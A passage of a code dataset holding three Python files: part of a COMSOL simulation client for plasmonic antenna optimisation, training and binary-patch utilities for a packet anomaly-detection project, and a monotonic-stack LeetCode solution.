\"RelativePermittivity\"\n )\n model.java.component(\"comp1\").physics(\"ewfd2\").feature(\"wee1\").set(\n \"omegap\", \"13.8*10^15\"\n )\n model.java.component(\"comp1\").physics(\"ewfd2\").feature(\"wee1\").set(\"f\", Integer(1))\n model.java.component(\"comp1\").physics(\"ewfd2\").feature(\"wee1\").set(\n \"omega0\", \"400[THz]\"\n )\n model.java.component(\"comp1\").physics(\"ewfd2\").feature(\"wee1\").set(\n \"mur_mat\", \"userdef\"\n )\n model.java.component(\"comp1\").physics(\"ewfd2\").feature(\"wee1\").set(\n \"sigma_mat\", \"userdef\"\n )\n\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size\").set(\"custom\", \"on\")\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size\").set(\"hmax\", \"lda0/6\")\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size1\").set(\n \"hauto\", Integer(4)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size2\").set(\"custom\", \"on\")\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size2\").set(\n \"hmax\", \"lda0/6/nb\"\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"size2\").set(\n \"hmaxactive\", JBoolean(True)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"ftri1\").set(\n \"smoothmaxiter\", Integer(10)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"ftri1\").set(\n \"smoothmaxdepth\", Integer(10)\n )\n 
model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"ftet1\").set(\n \"smoothmaxiter\", Integer(10)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"ftet1\").set(\n \"smoothmaxdepth\", Integer(10)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"ftet1\").set(\"optlevel\", \"high\")\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"swe1\").set(\n \"smoothmaxiter\", Integer(10)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"swe1\").set(\n \"smoothmaxdepth\", Integer(10)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").feature(\"swe1\").feature(\"dis1\").set(\n \"numelem\", Integer(8)\n )\n model.java.component(\"comp1\").mesh(\"mesh1\").run()\n\n model.java.study().create(\"std1\")\n model.java.study(\"std1\").create(\"wave\", \"Wavelength\")\n model.java.study(\"std1\").create(\"wave2\", \"Wavelength\")\n model.java.study(\"std1\").feature(\"wave\").set(\n \"activate\",\n [\"ewfd\", \"on\", \"ewfd2\", \"off\", \"frame:spatial1\", \"on\", \"frame:material1\", \"on\"],\n )\n model.java.study(\"std1\").feature(\"wave2\").set(\n \"activate\",\n [\"ewfd\", \"off\", \"ewfd2\", \"on\", \"frame:spatial1\", \"on\", \"frame:material1\", \"on\"],\n )\n\n\n model.java.sol().create(\"sol1\")\n model.java.sol(\"sol1\").study(\"std1\")\n model.java.sol(\"sol1\").attach(\"std1\")\n model.java.sol(\"sol1\").create(\"st1\", \"StudyStep\")\n model.java.sol(\"sol1\").create(\"v1\", \"Variables\")\n model.java.sol(\"sol1\").create(\"s1\", \"Stationary\")\n model.java.sol(\"sol1\").create(\"st2\", \"StudyStep\")\n model.java.sol(\"sol1\").create(\"v2\", \"Variables\")\n model.java.sol(\"sol1\").create(\"s2\", \"Stationary\")\n model.java.sol(\"sol1\").feature(\"s1\").create(\"p1\", \"Parametric\")\n model.java.sol(\"sol1\").feature(\"s1\").create(\"fc1\", \"FullyCoupled\")\n model.java.sol(\"sol1\").feature(\"s1\").create(\"d1\", \"Direct\")\n model.java.sol(\"sol1\").feature(\"s1\").create(\"i1\", \"Iterative\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").create(\"mg1\", \"Multigrid\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).create(\"va1\", \"Vanka\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).create(\"sv1\", \"SORVector\")\n model.java.sol(\"sol1\").feature(\"s1\").feature().remove(\"fcDef\")\n model.java.sol(\"sol1\").feature(\"s2\").create(\"p1\", \"Parametric\")\n model.java.sol(\"sol1\").feature(\"s2\").create(\"fc1\", \"FullyCoupled\")\n model.java.sol(\"sol1\").feature(\"s2\").create(\"i1\", \"Iterative\")\n model.java.sol(\"sol1\").feature(\"s2\").create(\"i2\", \"Iterative\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").create(\"mg1\", \"Multigrid\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).create(\"sv1\", \"SORVector\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).create(\"sv1\", \"SORVector\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").create(\"mg1\", \"Multigrid\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"pr\"\n ).create(\"sv1\", \"SORVector\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"po\"\n ).create(\"sv1\", \"SORVector\")\n model.java.sol(\"sol1\").feature(\"s2\").feature().remove(\"fcDef\")\n model.java.sol().create(\"sol2\")\n model.java.sol(\"sol2\").study(\"std1\")\n 
model.java.sol(\"sol2\").label(\"Parametric Solutions 1\")\n model.java.result().dataset().remove(\"dset2\")\n model.java.result().numerical().create(\"int1\", \"IntVolume\")\n model.java.result().numerical().create(\"gev1\", \"EvalGlobal\")\n model.java.result().numerical(\"int1\").selection().named(\n f\"{nano_particle_handle}_dom\"\n )\n model.java.result().numerical(\"int1\").set(\"probetag\", \"none\")\n model.java.result().numerical(\"gev1\").set(\"probetag\", \"none\")\n model.java.result().create(\"pg1\", \"PlotGroup3D\")\n model.java.result().create(\"pg2\", \"PlotGroup1D\")\n model.java.result().create(\"pg3\", \"PlotGroup3D\")\n model.java.result(\"pg1\").create(\"mslc1\", \"Multislice\")\n model.java.result(\"pg2\").create(\"plz1\", \"Polarization\")\n model.java.result(\"pg2\").create(\"plz2\", \"Polarization\")\n model.java.result(\"pg2\").feature(\"plz1\").create(\"col1\", \"Color\")\n model.java.result(\"pg2\").feature(\"plz2\").create(\"col1\", \"Color\")\n model.java.result(\"pg3\").create(\"mslc1\", \"Multislice\")\n model.java.result(\"pg3\").feature(\"mslc1\").set(\"expr\", \"ewfd2.normE\")\n\n model.java.nodeGroup().create(\"grp1\", \"Definitions\", \"comp1\")\n model.java.nodeGroup(\"grp1\").set(\"type\", \"selection\")\n model.java.nodeGroup(\"grp1\").placeAfter(\"selection\", \"uni1\")\n\n model.java.study(\"std1\").feature(\"wave\").set(\"plist\", \"lda0\")\n model.java.study(\"std1\").feature(\"wave2\").set(\"plist\", \"lda0\")\n\n model.java.sol(\"sol1\").attach(\"std1\")\n model.java.sol(\"sol1\").feature(\"st1\").label(\"Compile Equations: Wavelength Domain\")\n model.java.sol(\"sol1\").feature(\"v1\").label(\"Dependent Variables 1.1\")\n model.java.sol(\"sol1\").feature(\"v1\").set(\"clistctrl\", [\"p1\"])\n model.java.sol(\"sol1\").feature(\"v1\").set(\"cname\", [\"lambda0\"])\n model.java.sol(\"sol1\").feature(\"v1\").set(\"clist\", [\"lda0\"])\n model.java.sol(\"sol1\").feature(\"s1\").label(\"Stationary Solver 1.1\")\n model.java.sol(\"sol1\").feature(\"s1\").set(\"stol\", 0.01)\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"dDef\").active(JBoolean(True))\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"dDef\").label(\"Direct 2\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"dDef\").set(\"linsolver\", \"pardiso\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"aDef\").label(\"Advanced 1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"aDef\").set(\n \"complexfun\", JBoolean(True)\n )\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"p1\").label(\"Parametric 1.1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"p1\").set(\"pname\", [\"lambda0\"])\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"p1\").set(\"plistarr\", [\"lda0\"])\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"p1\").set(\"punit\", [\"\\u00b5m\"])\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"p1\").set(\"pcontinuationmode\", \"no\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"p1\").set(\"preusesol\", \"auto\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"p1\").set(\n \"uselsqdata\", JBoolean(False)\n )\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"fc1\").label(\"Fully Coupled 1.1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"d1\").label(\n \"Suggested Direct Solver (ewfd)\"\n )\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").label(\n \"Suggested Iterative Solver (ewfd)\"\n )\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").set(\"itrestart\", Integer(300))\n 
model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").set(\"prefuntype\", \"right\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"ilDef\").label(\n \"Incomplete LU 1\"\n )\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").label(\n \"Multigrid 1.1\"\n )\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").set(\n \"iter\", Integer(1)\n )\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).label(\"Presmoother 1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"soDef\").label(\"SOR 1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"va1\").label(\"Vanka 1.1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"va1\").set(\"iter\", Integer(1))\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"va1\").set(\"vankavars\", [\"comp1_E\"])\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"va1\").set(\"vankasolv\", \"stored\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"va1\").set(\"vankarelax\", 0.95)\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).label(\"Postsmoother 1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"soDef\").label(\"SOR 1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"sv1\").label(\"SOR Vector 1.1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"sv1\").set(\"iter\", Integer(1))\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"sv1\").set(\"relax\", 0.5)\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"sv1\").set(\"sorvecdof\", [\"comp1_E\"])\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"cs\"\n ).label(\"Coarse Solver 1\")\n model.java.sol(\"sol1\").feature(\"s1\").feature(\"i1\").feature(\"mg1\").feature(\n \"cs\"\n ).feature(\"dDef\").label(\"Direct 1\")\n model.java.sol(\"sol1\").feature(\"st2\").label(\n \"Compile Equations: Wavelength Domain 2\"\n )\n\n model.java.sol(\"sol1\").feature(\"st2\").set(\"studystep\", \"wave2\")\n model.java.sol(\"sol1\").feature(\"v2\").label(\"Dependent Variables 2.1\")\n model.java.sol(\"sol1\").feature(\"v2\").set(\"initmethod\", \"sol\")\n model.java.sol(\"sol1\").feature(\"v2\").set(\"initsol\", \"sol1\")\n model.java.sol(\"sol1\").feature(\"v2\").set(\"solnum\", \"auto\")\n model.java.sol(\"sol1\").feature(\"v2\").set(\"notsolmethod\", \"sol\")\n model.java.sol(\"sol1\").feature(\"v2\").set(\"notsol\", \"sol1\")\n model.java.sol(\"sol1\").feature(\"v2\").set(\"notsolnum\", \"auto\")\n model.java.sol(\"sol1\").feature(\"v2\").set(\"clistctrl\", [\"p1\"])\n model.java.sol(\"sol1\").feature(\"v2\").set(\"cname\", [\"lambda0\"])\n model.java.sol(\"sol1\").feature(\"v2\").set(\"clist\", [\"lda0\"])\n model.java.sol(\"sol1\").feature(\"s2\").label(\"Stationary Solver 2.1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"dDef\").active(JBoolean(True))\n 
model.java.sol(\"sol1\").feature(\"s2\").feature(\"dDef\").label(\"Direct 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"dDef\").set(\"linsolver\", \"pardiso\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"aDef\").label(\"Advanced 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"aDef\").set(\n \"complexfun\", JBoolean(True)\n )\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"p1\").label(\"Parametric 1.1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"p1\").set(\"pname\", [\"lambda0\"])\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"p1\").set(\"plistarr\", [\"lda0\"])\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"p1\").set(\"punit\", [\"\\u00b5m\"])\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"p1\").set(\"pcontinuationmode\", \"no\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"p1\").set(\"preusesol\", \"auto\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"p1\").set(\n \"uselsqdata\", JBoolean(False)\n )\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"fc1\").label(\"Fully Coupled 1.1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").label(\n \"Suggested Iterative Solver (ewfd2)\"\n )\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").set(\"linsolver\", \"bicgstab\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"ilDef\").label(\n \"Incomplete LU 1\"\n )\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").label(\n \"Multigrid 1.1\"\n )\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).label(\"Presmoother 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"soDef\").label(\"SOR 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"sv1\").label(\"SOR Vector 1.1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"sv1\").set(\"sorvecdof\", [\"comp1_E2\"])\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).label(\"Postsmoother 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"soDef\").label(\"SOR 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"sv1\").label(\"SOR Vector 1.1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"sv1\").set(\"sorvecdof\", [\"comp1_E2\"])\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"cs\"\n ).label(\"Coarse Solver 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i1\").feature(\"mg1\").feature(\n \"cs\"\n ).feature(\"dDef\").label(\"Direct 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").label(\n \"Suggested Iterative Solver (ewfd2) 2\"\n )\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").set(\"linsolver\", \"fgmres\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"ilDef\").label(\n \"Incomplete LU 1\"\n )\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").label(\n \"Multigrid 1.1\"\n )\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"pr\"\n ).label(\"Presmoother 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"soDef\").label(\"SOR 1\")\n 
model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"sv1\").label(\"SOR Vector 1.1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"pr\"\n ).feature(\"sv1\").set(\"sorvecdof\", [\"comp1_E2\"])\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"po\"\n ).label(\"Postsmoother 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"soDef\").label(\"SOR 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"sv1\").label(\"SOR Vector 1.1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"po\"\n ).feature(\"sv1\").set(\"sorvecdof\", [\"comp1_E2\"])\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"cs\"\n ).label(\"Coarse Solver 1\")\n model.java.sol(\"sol1\").feature(\"s2\").feature(\"i2\").feature(\"mg1\").feature(\n \"cs\"\n ).feature(\"dDef\").label(\"Direct 1\")\n model.java.sol(\"sol1\").runAll()\n\n model.java.result().numerical(\"int1\").label(\"LightToHeat\")\n model.java.result().numerical(\"int1\").set(\"table\", \"tbl2\")\n model.java.result().numerical(\"int1\").set(\"expr\", [\"ewfd2.Qh/(I0*w*w)\"])\n model.java.result().numerical(\"int1\").set(\"unit\", [\"1\"])\n model.java.result().numerical(\"int1\").set(\"descr\", [\"\"])\n model.java.result().numerical(\"gev1\").label(\n \"Reflectance, Transmittance, and Absorptance (ewfd)\"\n )\n model.java.result().numerical(\"gev1\").set(\"table\", \"tbl1\")\n model.java.result().numerical(\"gev1\").set(\n \"expr\",\n [\n \"ewfd.Rorder_0_0\",\n \"ewfd.Rtotal\",\n \"ewfd.Torder_0_0\",\n \"ewfd.Ttotal\",\n \"ewfd.RTtotal\",\n \"ewfd.Atotal\",\n ],\n )\n model.java.result().numerical(\"gev1\").set(\"unit\", [\"1\", \"1\", \"1\", \"1\", \"1\", \"1\"])\n model.java.result().numerical(\"gev1\").set(\n \"descr\",\n [\n \"Reflectance, order [0,0]\",\n \"Total reflectance\",\n \"Transmittance, order [0,0]\",\n \"Total transmittance\",\n \"Total reflectance and transmittance\",\n \"Absorptance\",\n ],\n )\n\n model.java.result().numerical(\"int1\").setResult()\n model.java.result().numerical(\"gev1\").setResult()\n model.java.result(\"pg1\").label(\"Electric Field (ewfd)\")\n model.java.result(\"pg1\").set(\"frametype\", \"spatial\")\n model.java.result(\"pg1\").feature(\"mslc1\").set(\"smooth\", \"internal\")\n model.java.result(\"pg1\").feature(\"mslc1\").set(\"resolution\", \"normal\")\n model.java.result(\"pg2\").label(\"Polarization Plot (ewfd)\")\n model.java.result(\"pg2\").set(\"looplevelinput\", [\"manual\"])\n model.java.result(\"pg2\").set(\"titletype\", \"manual\")\n model.java.result(\"pg2\").set(\"title\", \"Polarization states, Color: Phase (Radians)\")\n model.java.result(\"pg2\").feature(\"plz1\").set(\"linewidth\", Integer(2))\n model.java.result(\"pg2\").feature(\"plz1\").set(\"linewidthslider\", Integer(2))\n model.java.result(\"pg2\").feature(\"plz1\").set(\"legend\", JBoolean(True))\n model.java.result(\"pg2\").feature(\"plz1\").set(\"legendmethod\", \"manual\")\n model.java.result(\"pg2\").feature(\"plz1\").set(\"legends\", [\"Reflection\"])\n model.java.result(\"pg2\").feature(\"plz2\").set(\"linestyle\", \"dashed\")\n model.java.result(\"pg2\").feature(\"plz2\").set(\"linewidth\", Integer(2))\n model.java.result(\"pg2\").feature(\"plz2\").set(\"linewidthslider\", Integer(2))\n 
model.java.result(\"pg2\").feature(\"plz2\").set(\"legend\", JBoolean(True))\n model.java.result(\"pg2\").feature(\"plz2\").set(\"legendmethod\", \"manual\")\n model.java.result(\"pg2\").feature(\"plz2\").set(\"legends\", [\"Transmission\"])\n model.java.result(\"pg3\").label(\"Electric Field (ewfd2)\")\n model.java.result(\"pg3\").set(\"frametype\", \"spatial\")\n model.java.result(\"pg3\").feature(\"mslc1\").set(\"smooth\", \"internal\")\n model.java.result(\"pg3\").feature(\"mslc1\").set(\"resolution\", \"normal\")\n\n # Post\n\n model.java.result().numerical(\"int1\").label(\"LightToHeat\")\n # model.java.result().numerical(\"int1\").set(\"table\", \"tbl13\")\n model.java.result().numerical(\"int1\").set(\"expr\", [\"ewfd2.Qh/(I0*w*w)\"])\n model.java.result().numerical(\"int1\").set(\"unit\", [\"1\"])\n model.java.result().numerical(\"int1\").set(\"descr\", [\"\"])\n model.java.result().numerical(\"int1\").setResult()\n model.java.result(\"pg1\").feature(\"surf1\").set(\"resolution\", mesh_resolution)\n\n print(\"Running study...\")\n # model.java.study(\"std1\").run()\n\n if model_path:\n model.save(model_path)\n\n print(model.java.result().numerical(\"int1\").computeResult()[0][0][0])\n printElapsedTime(startTime, \"finish\")\n\n return float(model.java.result().numerical(\"int1\").computeResult()[0][0][0])\n","repo_name":"larsnolden/plasmonic_antennas_ga","sub_path":"Genetic Algorithm/comsolClient.py","file_name":"comsolClient.py","file_ext":"py","file_size_in_byte":62701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41125141462","text":"import torch \nimport numpy as np \nimport pandas as pd\n\n#############################################################################\n################################## UTILS ####################################\nclass AverageMeter(object):\n r\"\"\"Computes and stores the average and current value\n \"\"\"\n def __init__(self, name, fmt=':f'):\n self.name = name\n self.fmt = fmt\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n def __str__(self):\n fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'\n return fmtstr.format(**self.__dict__)\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, *meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def print(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n print('\\t'.join(entries))\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = '{:' + str(num_digits) + 'd}'\n return '[' + fmt + '/' + fmt.format(num_batches) + ']'\n\ndef accuracy(output, target, topk=(1,)):\n r\"\"\"Computes the accuracy over the $k$ top predictions for the specified values of k\n \"\"\"\n with torch.no_grad():\n maxk = max(topk)\n batch_size = target.size(0)\n _, idx = output.sort(descending=True)\n \n pred = idx[:,:maxk]\n \n pred = pred.t()\n correct = pred.eq(target.t())\n\n res = []\n for k in topk:\n correct_k = correct[:k].reshape(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\ndef just_convert_to_bin(number):\n if type(number) == str: # 문자열의 경우 \n binary_value = \"\"\n \n for char in number :\n binary_value += 
bin(ord(char)).lstrip(\"0b\")\n \n binary_value = binary_value\n return binary_value\n \n elif type(number) == int: # 정수형의 경우 그냥 binary로 바꾸고 '0b'제거 \n return bin(number).lstrip(\"0b\")\n \n else:\n float_length = 64\n formatted_number = \"{:.64f}\".format(number)\n \n # 필요한 만큼 타입 변환 \n dec, float_number = str(formatted_number).split(\".\")\n \n # 정수부는 이진수로 바로 바꿈 \n dec = int(dec)\n res = bin(dec).lstrip(\"0b\")\n \n # 소수부 연산 처리 \n while(len(res) < float_length):\n float_number = float(\"0.\" + float_number) \n float_number = float_number * 2\n float_number = \"{:.64f}\".format(float_number)\n dec, float_number = str(float_number).split(\".\")\n res += dec\n return res\n\ndef make_patch(item, patch_size):\n '''\n item should be a np.ndarray \n '''\n patch = \"\"\n total_length = patch_size[0] * patch_size[1]\n\n for elem in item : \n patch += just_convert_to_bin(elem)\n\n while(len(patch) < total_length) : # patch사이즈를 일정하게 만드는 거 \n patch+= \"0\"\n\n patch = list(map(int, patch))\n patch = np.array(patch)[:total_length] # 만약 바이너리로 변형한 부분이 packet 사이즈 보다 크면 뒤는 버려버리는 것 \n\n return patch.reshape(patch_size)\n\nclass PacketFeature:\n def __init__(self, feature_size):\n self.frame = np.zeros(feature_size)\n self.fsize = feature_size\n # print(\"Frame shape : \", self.frame.shape)\n # print(\"Frame size : \", self.fsize)\n self.patch_count = 0\n\n def append(self, patch):\n size = patch.shape # Ex 32 * 32\n stride = size[0]\n try:\n if ((self.fsize[0] % stride) == 0):\n pass\n else : \n raise\n except:\n print(\"frame size and patch size unmatched\")\n return\n \n if(self.patch_count >= stride*stride):\n self.patch_count = 0\n \n count = self.fsize[0] // stride\n row = self.patch_count//count # 만약 self.patch_count = 3 이면 patch row는 0~31에 내용이 들어가야하고 col에는 96~127에 있어야지 \n col = self.patch_count % count\n\n for row_stride in range(stride):\n current_row = row*stride + row_stride\n current_col_start = col*stride\n current_col_end = current_col_start + stride\n\n self.frame[current_row][current_col_start:current_col_end] = patch[row_stride]\n \n self.patch_count = self.patch_count + 1\n#############################################################################\n#############################################################################","repo_name":"alstjrdld1/Anomaly_detection","sub_path":"code/my_utils.py","file_name":"my_utils.py","file_ext":"py","file_size_in_byte":5039,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"11462600234","text":"# a=[36,9,13,27,43,25,44,48,12,40,37,20,26,36,1,20,19,14,28,38,39,42,21,30,29,29,44,14,33,31,48,11,43,6,19,33,43,41,40,22,6,49,16,44,20,15,13,10,2,3,16,31,40,50,5,30,27,41,37,13,46,45,25,32,26,16,10,42,45,1,49,50,7,50,28,15,12,45,34,30,4,36,16,8,30,9,30,43,34,36,39,21,49,29,40,47,33,28,36,29]\n# # a = [1,2,3]\n# n = len(a)\n# for i in range(n):\n# for j in range(i,n):\n# subarr = a[i:j+1]\n# # print(subarr)\n# tmp = sum(subarr)*min(subarr)\n# if tmp == 10374:\n# print(\"aa\",i,j)\n# print(subarr, sum(subarr))\n\n\"\"\"\nuse a monostack. 
we know the ple and nle when we pop\nthen we just use a prefix sum array to find the prodsum\nuse n+1 for emptying the stack trick\n\"\"\"\n\nfrom typing import List\n\nclass Solution:\n    def maxSumMinProduct(self, nums: List[int]) -> int:\n        # min in how many subarrays\n        # for this we can use a mono inc stack\n        # then while we pop we can add if increasing we make it yeyeye\n        n = len(nums)\n        \n        pref = [0]\n        tmp = 0\n        for i in range(n):\n            tmp+=nums[i]\n            pref.append(tmp)\n        \n        \n        stack = []\n        ans = float(\"-inf\")\n        for i in range(n+1):\n            ple = -1\n            # ple = i-1\n            mx = float(\"-inf\")\n            while stack and (i==n or nums[stack[-1]] >= nums[i]):\n                idx = stack.pop()\n                ple = -1\n                \n                if stack:\n                    ple = stack[-1]\n                cursum = pref[i] - pref[ple+1]\n                ans = max(ans, cursum*nums[idx])\n                \n            stack.append(i)\n            # print(stack)\n        mod = (10**9) + 7\n        return ans % mod\n        \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Johnkhk/Algorithms","sub_path":"subarrays/1856. Maximum Subarray Min-Product.py","file_name":"1856. Maximum Subarray Min-Product.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
